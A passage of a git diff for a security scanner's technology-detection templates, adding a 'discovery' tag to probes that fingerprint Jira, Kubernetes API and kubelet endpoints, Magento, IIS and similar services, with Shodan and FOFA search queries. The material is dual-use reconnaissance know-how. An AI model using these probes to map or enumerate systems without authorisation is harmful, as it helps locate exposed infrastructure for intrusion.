b/http/technologies/jira-detect.yaml index c27dfdd1c12..cb9fd6dd790 100644 --- a/http/technologies/jira-detect.yaml +++ b/http/technologies/jira-detect.yaml @@ -19,7 +19,7 @@ info: - http.component:"atlassian jira" - http.component:"atlassian confluence" - cpe:"cpe:2.3:a:atlassian:jira" - tags: tech,panel,jira,atlassian + tags: tech,panel,jira,atlassian,discovery http: - method: GET diff --git a/http/technologies/jira-serverinfo.yaml b/http/technologies/jira-serverinfo.yaml index 55b83912d04..ea9192b98ec 100644 --- a/http/technologies/jira-serverinfo.yaml +++ b/http/technologies/jira-serverinfo.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 1 - tags: jira,tech + tags: jira,tech,discovery http: - method: GET diff --git a/http/technologies/jitsi-meet-detect.yaml b/http/technologies/jitsi-meet-detect.yaml index f4e2f8d3700..4545fc61f14 100644 --- a/http/technologies/jitsi-meet-detect.yaml +++ b/http/technologies/jitsi-meet-detect.yaml @@ -11,7 +11,7 @@ info: vendor: jitsi product: meet shodan-query: http.title:"Jitsi Meet" - tags: tech,jitsi + tags: tech,jitsi,discovery http: - method: GET diff --git a/http/technologies/jolokia-detect.yaml b/http/technologies/jolokia-detect.yaml index 500c41f17fe..8888ce6e3b6 100644 --- a/http/technologies/jolokia-detect.yaml +++ b/http/technologies/jolokia-detect.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 1 - tags: tech,jolokia + tags: tech,jolokia,discovery http: - method: GET diff --git a/http/technologies/joomla-detect.yaml b/http/technologies/joomla-detect.yaml index 2f1ebe96c59..2759d7d77da 100644 --- a/http/technologies/joomla-detect.yaml +++ b/http/technologies/joomla-detect.yaml @@ -19,7 +19,7 @@ info: vendor: joomla product: joomla\\! google-query: Joomla! Administration Login inurl:"/index.php" || intitle:"Joomla Web Installer" - tags: tech,joomla,cms,oss + tags: tech,joomla,cms,oss,discovery http: - method: GET diff --git a/http/technologies/jsf-detect.yaml b/http/technologies/jsf-detect.yaml index cfa6b1d5805..6a21f9ddca7 100644 --- a/http/technologies/jsf-detect.yaml +++ b/http/technologies/jsf-detect.yaml @@ -7,7 +7,7 @@ info: description: Searches for JavaServer Faces content on a URL. metadata: max-request: 1 - tags: jsf,tech,primefaces,richfaces + tags: jsf,tech,primefaces,richfaces,discovery http: - method: GET diff --git a/http/technologies/json-server.yaml b/http/technologies/json-server.yaml index 730002a736f..8da0cdcb98f 100644 --- a/http/technologies/json-server.yaml +++ b/http/technologies/json-server.yaml @@ -9,7 +9,7 @@ info: verified: true max-request: 1 shodan-query: title:"JSON Server" - tags: exposure,devops,tech + tags: exposure,devops,tech,discovery http: - method: GET diff --git a/http/technologies/jspxcms-detect.yaml b/http/technologies/jspxcms-detect.yaml index 2483df830d3..1a03c5d1a0f 100644 --- a/http/technologies/jspxcms-detect.yaml +++ b/http/technologies/jspxcms-detect.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 1 - tags: tech,jspxcms + tags: tech,jspxcms,discovery http: - method: GET diff --git a/http/technologies/jway-products-detect.yaml b/http/technologies/jway-products-detect.yaml index 7a743c77849..1dcb50b8a45 100644 --- a/http/technologies/jway-products-detect.yaml +++ b/http/technologies/jway-products-detect.yaml @@ -11,7 +11,7 @@ info: metadata: max-request: 1 verified: true - tags: panel,jway,detect + tags: panel,jway,detect,discovery http: - method: GET diff --git a/http/technologies/khoj-detect.yaml b/http/technologies/khoj-detect.yaml index 9474da899a3..1c1fe0acb65 100644 --- a/http/technologies/khoj-detect.yaml +++ b/http/technologies/khoj-detect.yaml @@ -11,7 +11,7 @@ info: verified: true max-request: 1 fofa-query: icon_hash="-272853549" - tags: tech,khoj + tags: tech,khoj,discovery http: - method: GET diff --git a/http/technologies/kingsoft-webserver-detect.yaml b/http/technologies/kingsoft-webserver-detect.yaml index a40bd12de42..5ea85075f8d 100644 --- a/http/technologies/kingsoft-webserver-detect.yaml +++ b/http/technologies/kingsoft-webserver-detect.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 1 - tags: tech,kingsoft + tags: tech,kingsoft,discovery http: - method: GET diff --git a/http/technologies/kodexplorer-detect.yaml b/http/technologies/kodexplorer-detect.yaml index de2593ba359..0e860dcd696 100644 --- a/http/technologies/kodexplorer-detect.yaml +++ b/http/technologies/kodexplorer-detect.yaml @@ -11,7 +11,7 @@ info: vendor: kodcloud product: kodexplorer fofa-query: app="Powered-by-KodExplorer" - tags: kodexplorer,tech + tags: kodexplorer,tech,discovery http: - method: GET diff --git a/http/technologies/kong-detect.yaml b/http/technologies/kong-detect.yaml index f4b44e2fb27..796f404cf59 100644 --- a/http/technologies/kong-detect.yaml +++ b/http/technologies/kong-detect.yaml @@ -9,7 +9,7 @@ info: - https://github.com/Kong/kong metadata: max-request: 1 - tags: tech,kong + tags: tech,kong,discovery http: - method: GET diff --git a/http/technologies/kubernetes-operational-view-detect.yaml b/http/technologies/kubernetes-operational-view-detect.yaml index 55bc53b8e80..8c59e0f7925 100644 --- a/http/technologies/kubernetes-operational-view-detect.yaml +++ b/http/technologies/kubernetes-operational-view-detect.yaml @@ -11,7 +11,7 @@ info: verified: true max-request: 1 shodan-query: http.title:"Kubernetes Operational View" - tags: tech,k8s,kubernetes,devops,kube + tags: tech,k8s,kubernetes,devops,kube,discovery http: - method: GET diff --git a/http/technologies/kubernetes/etcd/etcd-version.yaml b/http/technologies/kubernetes/etcd/etcd-version.yaml index ab4eaf90504..0ff42cbd1dd 100644 --- a/http/technologies/kubernetes/etcd/etcd-version.yaml +++ b/http/technologies/kubernetes/etcd/etcd-version.yaml @@ -11,7 +11,7 @@ info: verified: true max-request: 1 shodan-query: product:"etcd" - tags: tech,k8s,kubernetes,devops,etcd + tags: tech,k8s,kubernetes,devops,etcd,discovery http: - method: GET diff --git a/http/technologies/kubernetes/kube-api/kube-api-deployments.yaml b/http/technologies/kubernetes/kube-api/kube-api-deployments.yaml index 9e2202b8b8c..6b309e38f20 100644 --- a/http/technologies/kubernetes/kube-api/kube-api-deployments.yaml +++ b/http/technologies/kubernetes/kube-api/kube-api-deployments.yaml @@ -7,7 +7,7 @@ info: description: Scans for kube deployments metadata: max-request: 1 - tags: tech,k8s,kubernetes,devops,kube + tags: tech,k8s,kubernetes,devops,kube,discovery http: - method: GET diff --git a/http/technologies/kubernetes/kube-api/kube-api-namespaces.yaml b/http/technologies/kubernetes/kube-api/kube-api-namespaces.yaml index 3fccd28463e..3e6a3825967 100644 --- a/http/technologies/kubernetes/kube-api/kube-api-namespaces.yaml +++ b/http/technologies/kubernetes/kube-api/kube-api-namespaces.yaml @@ -7,7 +7,7 @@ info: description: Scans for kube namespaces metadata: max-request: 1 - tags: tech,k8s,kubernetes,devops,kube + tags: tech,k8s,kubernetes,devops,kube,discovery http: - method: GET diff --git a/http/technologies/kubernetes/kube-api/kube-api-nodes.yaml b/http/technologies/kubernetes/kube-api/kube-api-nodes.yaml index 9d32297b710..3826357e452 100644 --- a/http/technologies/kubernetes/kube-api/kube-api-nodes.yaml +++ b/http/technologies/kubernetes/kube-api/kube-api-nodes.yaml @@ -7,7 +7,7 @@ info: description: Scans for kube nodes metadata: max-request: 1 - tags: tech,k8s,kubernetes,devops,kube + tags: tech,k8s,kubernetes,devops,kube,discovery http: - method: GET diff --git a/http/technologies/kubernetes/kube-api/kube-api-pods.yaml b/http/technologies/kubernetes/kube-api/kube-api-pods.yaml index a8ad3df24be..202c2673ad8 100644 --- a/http/technologies/kubernetes/kube-api/kube-api-pods.yaml +++ b/http/technologies/kubernetes/kube-api/kube-api-pods.yaml @@ -7,7 +7,7 @@ info: description: Scans for kube pods metadata: max-request: 1 - tags: tech,k8s,kubernetes,devops,kube + tags: tech,k8s,kubernetes,devops,kube,discovery http: - method: GET diff --git a/http/technologies/kubernetes/kube-api/kube-api-secrets.yaml b/http/technologies/kubernetes/kube-api/kube-api-secrets.yaml index 03a6b0c9b9e..fa0497ea5b7 100644 --- a/http/technologies/kubernetes/kube-api/kube-api-secrets.yaml +++ b/http/technologies/kubernetes/kube-api/kube-api-secrets.yaml @@ -7,7 +7,7 @@ info: description: Scans for kube secrets endpoint metadata: max-request: 1 - tags: tech,k8s,kubernetes,devops,kube + tags: tech,k8s,kubernetes,devops,kube,discovery http: - method: GET diff --git a/http/technologies/kubernetes/kube-api/kube-api-services.yaml b/http/technologies/kubernetes/kube-api/kube-api-services.yaml index f2cdc08ed3f..de4b7b114ed 100644 --- a/http/technologies/kubernetes/kube-api/kube-api-services.yaml +++ b/http/technologies/kubernetes/kube-api/kube-api-services.yaml @@ -7,7 +7,7 @@ info: description: Scans for kube services metadata: max-request: 1 - tags: tech,k8s,kubernetes,devops,kube + tags: tech,k8s,kubernetes,devops,kube,discovery http: - method: GET diff --git a/http/technologies/kubernetes/kube-api/kube-api-version.yaml b/http/technologies/kubernetes/kube-api/kube-api-version.yaml index 82621df3582..fcf20e73566 100644 --- a/http/technologies/kubernetes/kube-api/kube-api-version.yaml +++ b/http/technologies/kubernetes/kube-api/kube-api-version.yaml @@ -7,7 +7,7 @@ info: description: Searches for exposed Kubernetes API servers which return version information unauthenticated metadata: max-request: 1 - tags: tech,k8s,kubernetes,devops,kube + tags: tech,k8s,kubernetes,devops,kube,discovery http: - method: GET diff --git a/http/technologies/kubernetes/kubelet/kubelet-healthz.yaml b/http/technologies/kubernetes/kubelet/kubelet-healthz.yaml index e58c108745b..88a68131256 100644 --- a/http/technologies/kubernetes/kubelet/kubelet-healthz.yaml +++ b/http/technologies/kubernetes/kubelet/kubelet-healthz.yaml @@ -7,7 +7,7 @@ info: description: Scans for kubelet healthz metadata: max-request: 1 - tags: tech,k8s,kubernetes,devops,kubelet + tags: tech,k8s,kubernetes,devops,kubelet,discovery http: - method: GET diff --git a/http/technologies/kubernetes/kubelet/kubelet-metrics.yaml b/http/technologies/kubernetes/kubelet/kubelet-metrics.yaml index 8408c358915..98f57538de0 100644 --- a/http/technologies/kubernetes/kubelet/kubelet-metrics.yaml +++ b/http/technologies/kubernetes/kubelet/kubelet-metrics.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: http.title:"Kube Metrics Server" - tags: tech,k8s,kubernetes,devops,kubelet + tags: tech,k8s,kubernetes,devops,kubelet,discovery http: - method: GET diff --git a/http/technologies/kubernetes/kubelet/kubelet-pods.yaml b/http/technologies/kubernetes/kubelet/kubelet-pods.yaml index eba39c28cdf..89fbb5f1ca2 100644 --- a/http/technologies/kubernetes/kubelet/kubelet-pods.yaml +++ b/http/technologies/kubernetes/kubelet/kubelet-pods.yaml @@ -7,7 +7,7 @@ info: description: Scans for kubelet pods metadata: max-request: 1 - tags: tech,k8s,kubernetes,devops,kubelet,pods + tags: tech,k8s,kubernetes,devops,kubelet,pods,discovery http: - method: GET diff --git a/http/technologies/kubernetes/kubelet/kubelet-runningpods.yaml b/http/technologies/kubernetes/kubelet/kubelet-runningpods.yaml index c2606f2e8f2..bc8f4890326 100644 --- a/http/technologies/kubernetes/kubelet/kubelet-runningpods.yaml +++ b/http/technologies/kubernetes/kubelet/kubelet-runningpods.yaml @@ -7,7 +7,7 @@ info: description: Scans for kubelet running pods metadata: max-request: 1 - tags: tech,k8s,kubernetes,devops,kubelet + tags: tech,k8s,kubernetes,devops,kubelet,discovery http: - method: GET diff --git a/http/technologies/kubernetes/kubelet/kubelet-stats.yaml b/http/technologies/kubernetes/kubelet/kubelet-stats.yaml index 8f6c9c0c0d3..3838040869c 100644 --- a/http/technologies/kubernetes/kubelet/kubelet-stats.yaml +++ b/http/technologies/kubernetes/kubelet/kubelet-stats.yaml @@ -7,7 +7,7 @@ info: description: Scans for kubelet stats metadata: max-request: 1 - tags: tech,k8s,kubernetes,devops,kubelet + tags: tech,k8s,kubernetes,devops,kubelet,discovery http: - method: GET diff --git a/http/technologies/kubernetes/kubernetes-version.yaml b/http/technologies/kubernetes/kubernetes-version.yaml index 99219aa91d5..7abb2d7978d 100644 --- a/http/technologies/kubernetes/kubernetes-version.yaml +++ b/http/technologies/kubernetes/kubernetes-version.yaml @@ -11,7 +11,7 @@ info: metadata: max-request: 1 shodan-query: product:"Kubernetes" version:"1.21.5-eks-bc4871b" - tags: tech,k8s,kubernetes,devops + tags: tech,k8s,kubernetes,devops,discovery http: - method: GET diff --git a/http/technologies/landesk/landesk-csa.yaml b/http/technologies/landesk/landesk-csa.yaml index e81d13b9ea9..6d1598ed916 100644 --- a/http/technologies/landesk/landesk-csa.yaml +++ b/http/technologies/landesk/landesk-csa.yaml @@ -8,7 +8,7 @@ info: verified: true max-request: 1 shodan-query: http.html:"LANDESK(R)" - tags: tech,landesk + tags: tech,landesk,discovery http: - method: GET diff --git a/http/technologies/landesk/landesk-ma.yaml b/http/technologies/landesk/landesk-ma.yaml index eed75266e85..1dc778c0c51 100644 --- a/http/technologies/landesk/landesk-ma.yaml +++ b/http/technologies/landesk/landesk-ma.yaml @@ -12,7 +12,7 @@ info: vendor: landesk product: landesk_management_suite shodan-query: http.html:"LANDESK(R)" - tags: tech,landesk + tags: tech,landesk,discovery http: - method: GET diff --git a/http/technologies/lexmark-detect.yaml b/http/technologies/lexmark-detect.yaml index a8f0b920e98..8de8e968e4b 100644 --- a/http/technologies/lexmark-detect.yaml +++ b/http/technologies/lexmark-detect.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 1 - tags: tech,airtame,printer + tags: tech,airtame,printer,discovery http: - method: GET diff --git a/http/technologies/limesurvey-detect.yaml b/http/technologies/limesurvey-detect.yaml index 71057a712a6..ef02a277d6c 100644 --- a/http/technologies/limesurvey-detect.yaml +++ b/http/technologies/limesurvey-detect.yaml @@ -16,7 +16,7 @@ info: vendor: limesurvey product: limesurvey shodan-query: http.favicon.hash:1781653957 - tags: tech,limesurvey + tags: tech,limesurvey,discovery http: - method: GET diff --git a/http/technologies/linkerd-detect.yaml b/http/technologies/linkerd-detect.yaml index e61ecce5f6a..e02806132aa 100644 --- a/http/technologies/linkerd-detect.yaml +++ b/http/technologies/linkerd-detect.yaml @@ -8,7 +8,7 @@ info: - https://linkerd.io metadata: max-request: 1 - tags: tech,linkerd + tags: tech,linkerd,discovery http: - method: GET diff --git a/http/technologies/livehelperchat-detect.yaml b/http/technologies/livehelperchat-detect.yaml index 5bfd1ae748b..0a6d85c0af1 100644 --- a/http/technologies/livehelperchat-detect.yaml +++ b/http/technologies/livehelperchat-detect.yaml @@ -12,7 +12,7 @@ info: vendor: livehelperchat product: live_helper_chat fofa-query: title="Live Helper Chat" - tags: livehelperchat,tech + tags: livehelperchat,tech,discovery http: - method: GET diff --git a/http/technologies/lobechat-detect.yaml b/http/technologies/lobechat-detect.yaml index a1c2e0f9521..7059d7f6812 100644 --- a/http/technologies/lobechat-detect.yaml +++ b/http/technologies/lobechat-detect.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 fofa-query: icon_hash="1975020705" - tags: lobechat,tech,detect + tags: lobechat,tech,detect,discovery http: - method: GET diff --git a/http/technologies/localai-detect.yaml b/http/technologies/localai-detect.yaml index e9bfcd1705d..099c662cd10 100644 --- a/http/technologies/localai-detect.yaml +++ b/http/technologies/localai-detect.yaml @@ -16,7 +16,7 @@ info: product: localai fofa-query: "LocalAI API" shodan-query: http.favicon.hash:-976853304 - tags: localai,tech,detect + tags: localai,tech,detect,discovery http: - method: GET diff --git a/http/technologies/lollms-webui-detect.yaml b/http/technologies/lollms-webui-detect.yaml index 645f0ea3b66..07458f118fc 100644 --- a/http/technologies/lollms-webui-detect.yaml +++ b/http/technologies/lollms-webui-detect.yaml @@ -13,7 +13,7 @@ info: verified: true max-request: 1 fofa-query: "LoLLMS WebUI - Welcome" - tags: lollms-webui,tech,detect + tags: lollms-webui,tech,detect,discovery http: - method: GET diff --git a/http/technologies/lotus-domino-version.yaml b/http/technologies/lotus-domino-version.yaml index b4055dcfc91..ce6a2906975 100644 --- a/http/technologies/lotus-domino-version.yaml +++ b/http/technologies/lotus-domino-version.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 7 - tags: tech,lotus + tags: tech,lotus,discovery http: - method: GET diff --git a/http/technologies/lucee-detect.yaml b/http/technologies/lucee-detect.yaml index 659b262da2f..a2bb7d44e02 100644 --- a/http/technologies/lucee-detect.yaml +++ b/http/technologies/lucee-detect.yaml @@ -9,7 +9,7 @@ info: max-request: 2 shodan-query: "html:\"Lucee\"" fofa-query: "app=\"Lucee-Engine\"" - tags: tech,lucee + tags: tech,lucee,discovery http: - method: GET diff --git a/http/technologies/lucy-admin-panel.yaml b/http/technologies/lucy-admin-panel.yaml index c0e82c837c3..c1c9ffb88ce 100644 --- a/http/technologies/lucy-admin-panel.yaml +++ b/http/technologies/lucy-admin-panel.yaml @@ -8,7 +8,7 @@ info: verified: true max-request: 2 shodan-query: html:'title="Lucy' - tags: tech,lucy + tags: tech,lucy,discovery http: - method: GET diff --git a/http/technologies/luxtrust-cosi-detect.yaml b/http/technologies/luxtrust-cosi-detect.yaml index f13a3c32193..abbe51c7e02 100644 --- a/http/technologies/luxtrust-cosi-detect.yaml +++ b/http/technologies/luxtrust-cosi-detect.yaml @@ -1,27 +1,27 @@ -id: luxtrust-cosi-detect - -info: - name: LuxTrust COSI - Detect - author: righettod - severity: info - description: | - LuxTrust COSI was detected. - reference: - - https://luxtrust.com/en/professionals/our-digital-solutions/sign-electronically - metadata: - max-request: 1 - verified: true - tags: panel,luxtrust,detect - -http: - - method: GET - path: - - "{{BaseURL}}/web/thanks" - - matchers: - - type: dsl - dsl: - - 'status_code == 200' - - 'contains_all(to_lower(body), "plateforme de signature", "esign-web")' +id: luxtrust-cosi-detect + +info: + name: LuxTrust COSI - Detect + author: righettod + severity: info + description: | + LuxTrust COSI was detected. + reference: + - https://luxtrust.com/en/professionals/our-digital-solutions/sign-electronically + metadata: + max-request: 1 + verified: true + tags: panel,luxtrust,detect,discovery + +http: + - method: GET + path: + - "{{BaseURL}}/web/thanks" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains_all(to_lower(body), "plateforme de signature", "esign-web")' condition: and # digest: 490a00463044022042830d4adcdcdfc4c26e5d6638d6f2759e91880ea2e3bb7f643655ee2dbec0ae02203790fb01c53b5561d73a761b41f4d7653435de5528d59637aab7fde210590076:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/magento-detect.yaml b/http/technologies/magento-detect.yaml index a7b8f4ad4fb..4880c37cacf 100644 --- a/http/technologies/magento-detect.yaml +++ b/http/technologies/magento-detect.yaml @@ -15,7 +15,7 @@ info: vendor: magento product: magento shodan-query: http.component:"Magento" - tags: magento,tech + tags: magento,tech,discovery http: - method: GET diff --git a/http/technologies/magento-eol.yaml b/http/technologies/magento-eol.yaml index 04d7e3e1c9c..6a4e6f06b2b 100644 --- a/http/technologies/magento-eol.yaml +++ b/http/technologies/magento-eol.yaml @@ -18,7 +18,7 @@ info: shodan-query: http.component:"Magento" product: magento vendor: magento - tags: magento,tech,cms + tags: magento,tech,cms,discovery http: - method: GET diff --git a/http/technologies/magento-version-detect.yaml b/http/technologies/magento-version-detect.yaml index ab3a77b1406..a724a689442 100644 --- a/http/technologies/magento-version-detect.yaml +++ b/http/technologies/magento-version-detect.yaml @@ -19,7 +19,7 @@ info: shodan-query: http.component:"Magento" product: magento vendor: magento - tags: tech,magento,cms + tags: tech,magento,cms,discovery http: - raw: diff --git a/http/technologies/magmi-detect.yaml b/http/technologies/magmi-detect.yaml index f040cae1baf..da9cb85c03e 100644 --- a/http/technologies/magmi-detect.yaml +++ b/http/technologies/magmi-detect.yaml @@ -12,7 +12,7 @@ info: vendor: magmi_project product: magmi shodan-query: http.component:"Magento" - tags: magento,magmi,plugin,tech + tags: magento,magmi,plugin,tech,discovery http: - method: GET diff --git a/http/technologies/maian-cart-detect.yaml b/http/technologies/maian-cart-detect.yaml index ecb16dddbe2..5b3f39c6fe8 100644 --- a/http/technologies/maian-cart-detect.yaml +++ b/http/technologies/maian-cart-detect.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 1 - tags: tech,maian + tags: tech,maian,discovery http: - method: GET diff --git a/http/technologies/mappproxy-detect.yaml b/http/technologies/mappproxy-detect.yaml index 4b7b43eb275..c1aeee0353d 100644 --- a/http/technologies/mappproxy-detect.yaml +++ b/http/technologies/mappproxy-detect.yaml @@ -12,7 +12,7 @@ info: metadata: max-request: 2 shodan-query: http.html:"Welcome to MapProxy" - tags: tech,mapproxy,detect + tags: tech,mapproxy,detect,discovery http: - method: GET diff --git a/http/technologies/matrix-detect.yaml b/http/technologies/matrix-detect.yaml index 9787c39fdfb..e9e5fd4eb4c 100644 --- a/http/technologies/matrix-detect.yaml +++ b/http/technologies/matrix-detect.yaml @@ -8,7 +8,7 @@ info: reference: https://spec.matrix.org/v1.3/server-server-api/#getwell-knownmatrixserver, https://spec.matrix.org/v1.3/client-server-api/#getwell-knownmatrixclient metadata: max-request: 2 - tags: tech,matrix + tags: tech,matrix,discovery http: - method: GET diff --git a/http/technologies/matrix-homeserver-detect.yaml b/http/technologies/matrix-homeserver-detect.yaml index fc46330cf57..96097911a02 100644 --- a/http/technologies/matrix-homeserver-detect.yaml +++ b/http/technologies/matrix-homeserver-detect.yaml @@ -14,7 +14,7 @@ info: vendor: matrix product: synapse shodan-query: title:"Synapse is running" - tags: tech,matrix,synapse + tags: tech,matrix,synapse,discovery http: - method: GET diff --git a/http/technologies/mcp-inspector-detect.yaml b/http/technologies/mcp-inspector-detect.yaml index 0a09fef94d1..ff20b67ccf0 100644 --- a/http/technologies/mcp-inspector-detect.yaml +++ b/http/technologies/mcp-inspector-detect.yaml @@ -11,7 +11,7 @@ info: metadata: verified: true fofa-query: title="MCP Inspector" - tags: tech,mcp,anthropic + tags: tech,mcp,anthropic,discovery flow: http(1) && http(2) diff --git a/http/technologies/meilisearch-detect.yaml b/http/technologies/meilisearch-detect.yaml index ddd68dd3bee..b9a26906fde 100644 --- a/http/technologies/meilisearch-detect.yaml +++ b/http/technologies/meilisearch-detect.yaml @@ -1,5 +1,5 @@ -id: meilisearch-detect - +id: meilisearch-detect + info: name: Meilisearch - Detect author: userdehghani @@ -12,18 +12,18 @@ info: verified: true max-request: 1 fofa-query: app="meilisearch" - tags: meilisearch,detect,tech + tags: meilisearch,detect,tech,discovery -http: - - method: GET - path: - - "{{BaseURL}}" - - matchers-condition: and - matchers: - - type: dsl - dsl: - - 'status_code == 200' - - 'contains(body, "Meilisearch is running")' +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(body, "Meilisearch is running")' condition: and # digest: 4b0a00483046022100dd730cbadd787cb6e49e08b52103dcac57c5d159509c6ea0cac9dcc5aaa149e8022100f8409fd492b684058498b00f8a4d2ad67e8ac47a8901dec3acedbbdb01ebf56e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/meshery-detect.yaml b/http/technologies/meshery-detect.yaml index 9865acef20a..0a64f5716c8 100644 --- a/http/technologies/meshery-detect.yaml +++ b/http/technologies/meshery-detect.yaml @@ -16,7 +16,7 @@ info: product: meshery shodan-query: http.title:"Meshery" fofa-query: title="Meshery" - tags: tech,meshery,detect + tags: tech,meshery,detect,discovery http: - method: GET diff --git a/http/technologies/metatag-cms.yaml b/http/technologies/metatag-cms.yaml index e15ceda9232..6cbeb612c7a 100644 --- a/http/technologies/metatag-cms.yaml +++ b/http/technologies/metatag-cms.yaml @@ -9,7 +9,7 @@ info: - https://www.w3schools.com/tags/att_meta_name.asp metadata: max-request: 1 - tags: tech,cms + tags: tech,cms,discovery http: - method: GET diff --git a/http/technologies/meteobridge-detect.yaml b/http/technologies/meteobridge-detect.yaml index 122247f628b..6554acd0f37 100644 --- a/http/technologies/meteobridge-detect.yaml +++ b/http/technologies/meteobridge-detect.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: "meteobridge" - tags: meteobridge,tech,detect + tags: meteobridge,tech,detect,discovery http: - method: GET diff --git a/http/technologies/microfocus-iprint-detect.yaml b/http/technologies/microfocus-iprint-detect.yaml index 5bcd3ee53f9..c8463f2fc61 100644 --- a/http/technologies/microfocus-iprint-detect.yaml +++ b/http/technologies/microfocus-iprint-detect.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: http.html:"Micro Focus iPrint Appliance" - tags: tech,microfocus,detect + tags: tech,microfocus,detect,discovery http: - method: GET diff --git a/http/technologies/microsoft-iis-8.yaml b/http/technologies/microsoft-iis-8.yaml index f533103ca53..581f42a04a4 100644 --- a/http/technologies/microsoft-iis-8.yaml +++ b/http/technologies/microsoft-iis-8.yaml @@ -11,7 +11,7 @@ info: vendor: microsoft product: iis shodan-query: http.title:"Microsoft Internet Information Services 8" - tags: tech,iis,microsoft + tags: tech,iis,microsoft,discovery http: - method: GET diff --git a/http/technologies/microsoft/aspnet-version-detect.yaml b/http/technologies/microsoft/aspnet-version-detect.yaml index 7b7f1082613..8066822bffb 100644 --- a/http/technologies/microsoft/aspnet-version-detect.yaml +++ b/http/technologies/microsoft/aspnet-version-detect.yaml @@ -14,7 +14,7 @@ info: verified: true max-request: 1 shodan-query: "X-AspNet-Version" - tags: tech,detect,aspnet + tags: tech,detect,aspnet,discovery http: - method: GET diff --git a/http/technologies/microsoft/aspnetmvc-version-disclosure.yaml b/http/technologies/microsoft/aspnetmvc-version-disclosure.yaml index 4ccc256edae..276cb38b92b 100644 --- a/http/technologies/microsoft/aspnetmvc-version-disclosure.yaml +++ b/http/technologies/microsoft/aspnetmvc-version-disclosure.yaml @@ -14,7 +14,7 @@ info: verified: true max-request: 1 shodan-query: "X-AspNetMvc-Version" - tags: aspnetmvc,tech,detect + tags: aspnetmvc,tech,detect,discovery http: - method: GET diff --git a/http/technologies/microsoft/default-azure-function-app.yaml b/http/technologies/microsoft/default-azure-function-app.yaml index b7a4a2fbd2b..cdcebd3ddbb 100644 --- a/http/technologies/microsoft/default-azure-function-app.yaml +++ b/http/technologies/microsoft/default-azure-function-app.yaml @@ -11,7 +11,7 @@ info: vendor: microsoft product: azure shodan-query: html:"Your Azure Function App is up and running" - tags: tech,azure,microsoft + tags: tech,azure,microsoft,discovery http: - method: GET diff --git a/http/technologies/microsoft/default-iis7-page.yaml b/http/technologies/microsoft/default-iis7-page.yaml index 5c3d8dcafae..e4f2ee37698 100644 --- a/http/technologies/microsoft/default-iis7-page.yaml +++ b/http/technologies/microsoft/default-iis7-page.yaml @@ -11,7 +11,7 @@ info: vendor: microsoft product: iis shodan-query: http.title:"IIS7" - tags: tech,iis + tags: tech,iis,discovery http: - method: GET diff --git a/http/technologies/microsoft/default-microsoft-azure-page.yaml b/http/technologies/microsoft/default-microsoft-azure-page.yaml index 5c1f9eb70cb..59d5655f51a 100644 --- a/http/technologies/microsoft/default-microsoft-azure-page.yaml +++ b/http/technologies/microsoft/default-microsoft-azure-page.yaml @@ -11,7 +11,7 @@ info: vendor: microsoft product: azure shodan-query: http.title:"Microsoft Azure App Service - Welcome" - tags: tech,azure,microsoft + tags: tech,azure,microsoft,discovery http: - method: GET diff --git a/http/technologies/microsoft/default-windows-server-page.yaml b/http/technologies/microsoft/default-windows-server-page.yaml index d9f9fd2187b..6bf5a4f8c7b 100644 --- a/http/technologies/microsoft/default-windows-server-page.yaml +++ b/http/technologies/microsoft/default-windows-server-page.yaml @@ -11,7 +11,7 @@ info: vendor: microsoft product: windows_server_2003 shodan-query: http.title:"IIS Windows Server" - tags: tech,windows,iis + tags: tech,windows,iis,discovery http: - method: GET diff --git a/http/technologies/microsoft/microsoft-iis-version.yaml b/http/technologies/microsoft/microsoft-iis-version.yaml index 909f86dbc41..7d3983598c3 100644 --- a/http/technologies/microsoft/microsoft-iis-version.yaml +++ b/http/technologies/microsoft/microsoft-iis-version.yaml @@ -7,7 +7,7 @@ info: description: Some Microsoft IIS servers have the version on the response header. Useful when you need to find specific CVEs on your targets. metadata: max-request: 1 - tags: tech,microsoft,iis + tags: tech,microsoft,iis,discovery http: diff --git a/http/technologies/microsoft/microsoft-sharepoint-detect.yaml b/http/technologies/microsoft/microsoft-sharepoint-detect.yaml index 388a5ff2844..b612792e61a 100644 --- a/http/technologies/microsoft/microsoft-sharepoint-detect.yaml +++ b/http/technologies/microsoft/microsoft-sharepoint-detect.yaml @@ -7,7 +7,7 @@ info: description: Check for SharePoint, using HTTP header MicrosoftSharePointTeamServices metadata: max-request: 1 - tags: sharepoint,iis,microsoft,tech + tags: sharepoint,iis,microsoft,tech,discovery http: - method: GET diff --git a/http/technologies/microsoft/ms-exchange-server.yaml b/http/technologies/microsoft/ms-exchange-server.yaml index 395bab6cbef..24a48700701 100644 --- a/http/technologies/microsoft/ms-exchange-server.yaml +++ b/http/technologies/microsoft/ms-exchange-server.yaml @@ -9,7 +9,7 @@ info: - https://github.com/GossiTheDog/scanning/blob/main/http-vuln-exchange.nse metadata: max-request: 1 - tags: microsoft,exchange,tech + tags: microsoft,exchange,tech,discovery http: - method: GET diff --git a/http/technologies/microsoft/powerbi-report-server-detect.yaml b/http/technologies/microsoft/powerbi-report-server-detect.yaml index 37781b91b51..c5ba4842a34 100644 --- a/http/technologies/microsoft/powerbi-report-server-detect.yaml +++ b/http/technologies/microsoft/powerbi-report-server-detect.yaml @@ -1,39 +1,39 @@ -id: powerbi-report-server-detect - -info: - name: PowerBI Report Server - Detect - author: righettod - severity: info - description: | - PowerBI Report Server was detected. - reference: - - https://www.microsoft.com/en-us/power-platform/products/power-bi/report-server - metadata: - max-request: 1 - verified: true - shodan-query: http.html:"report server web portal" - tags: panel,powerbi,detect - -http: - - method: GET - path: - - "{{BaseURL}}/reports/api/v2.0/System" - - 